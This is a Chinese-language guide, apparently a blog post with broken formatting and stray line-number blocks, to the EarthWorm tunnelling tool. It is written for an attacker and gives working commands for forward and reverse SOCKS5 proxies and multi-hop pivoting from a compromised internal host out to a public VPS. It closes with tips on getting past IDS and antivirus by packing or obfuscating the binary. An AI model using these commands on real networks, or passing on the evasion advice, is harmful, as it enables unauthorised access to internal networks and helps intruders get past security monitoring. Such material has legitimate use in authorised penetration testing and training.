EarthWorm (EW) 使用指南

EarthWorm 是一款高性能的轻量级内网穿透工具,支持正向/反向 SOCKS5 代理及多级转发。

image-20260402144048127

1. 基础环境

  • 核心程序:单个二进制文件(如 ew_for_Win.exe, ew_for_linux64 等)。
  • 核心参数:通过 -s 参数指定链路模式。

2. 常用操作场景

场景 A:正向 SOCKS5 代理

适用情况:目标机有公网 IP,且防火墙允许外部连接其特定端口。

  1. 在目标机上开启监听:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
       ./ew -s ssocksd -l 8888

    1. **攻击机操作**:直接设置浏览器或代理工具(Proxifier)连接 `目标机IP:8888` 即可。

    ### 场景 B:反向 SOCKS5 代理(最常用)

    **适用情况**:目标机在内网,无法从外部访问,但它可以主动连接外网。

    1. **在公网 VPS 上监听(转接隧道):**

    将 1080 端口收到的代理请求转发给反连 8888 端口的机器

    ./ew -s rcsocks -l 1080 -e 8888

    1
    2
    3
    4
    5

    2. **在内网目标机上执行(主动回连):**

    ./ew -s rssocks -d <公网VPS_IP> -e 8888

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13

    3. **使用方式**:连接 `公网VPS_IP:1080` 即可进入内网。

    ------

    ## 3. 进阶:二重内网渗透

    ### 情况 1:A主机公网可达,B主机仅A可达

    1. **B 主机(内网深处)**:开启正向代理。

    ./ew -s ssocksd -l 9999

    1
    2
    3
    4
    5

    2. **A 主机(边界跳板)**:将流量转发给 B。

    ./ew -s lcx_tran -l 1080 -f <B主机IP> -g 9999

    1
    2
    3
    4
    5
    6
    7
    8
    9

    3. **使用方式**:访问 `A主机IP:1080`。

    ### 情况 2:A、B 均在内网(通过公网 VPS 中转)

    1. **公网 VPS**:开启监听。

    ./ew -s lcx_listen -l 1080 -e 8888

    1
    2
    3
    4
    5

    2. **B 主机(内网深处)**:开启代理服务。

    ./ew -s ssocksd -l 9999

    1
    2
    3
    4
    5

    3. **A 主机(中继跳板)**:打通公网与内网 B 的隧道。

    ./ew -s lcx_slave -d -e 8888 -f <B主机IP> -g 9999

  2. 使用方式:访问 VPS_IP:1080

4. 参数手册

模式说明 (-s)

  • ssocksd:正向 SOCKS5 服务。
  • rcsocks:反向代理监听服务端(配合 rssocks)。
  • rssocks:反向代理客户端。
  • lcx_listen:中转模式,监听两个端口,打通数据流。
  • lcx_tran:中转模式,监听本地,转发至远程。
  • lcx_slave:反向中转模式,同时连接两个远程地址。

通用选项

  • -l:本地监听端口。
  • -d:远程目标 IP。
  • -e:远程目标端口。
  • -f:转发目标 IP。
  • -g:转发目标端口。
  • -t <ms>:设置超时时间,默认 10000ms (10秒)

5. 安全建议

[!WARNING]

  1. 特征明显:由于 EW 长时间未更新,其流量特征容易被 IDS/态势感知拦截。
  2. 免杀处理:二进制文件极易被杀毒软件直接清除,实战中需配合加壳或代码混淆。
  3. 替代方案:若环境允许,建议优先考虑 frp, npsVenom 等具备加密能力的工具。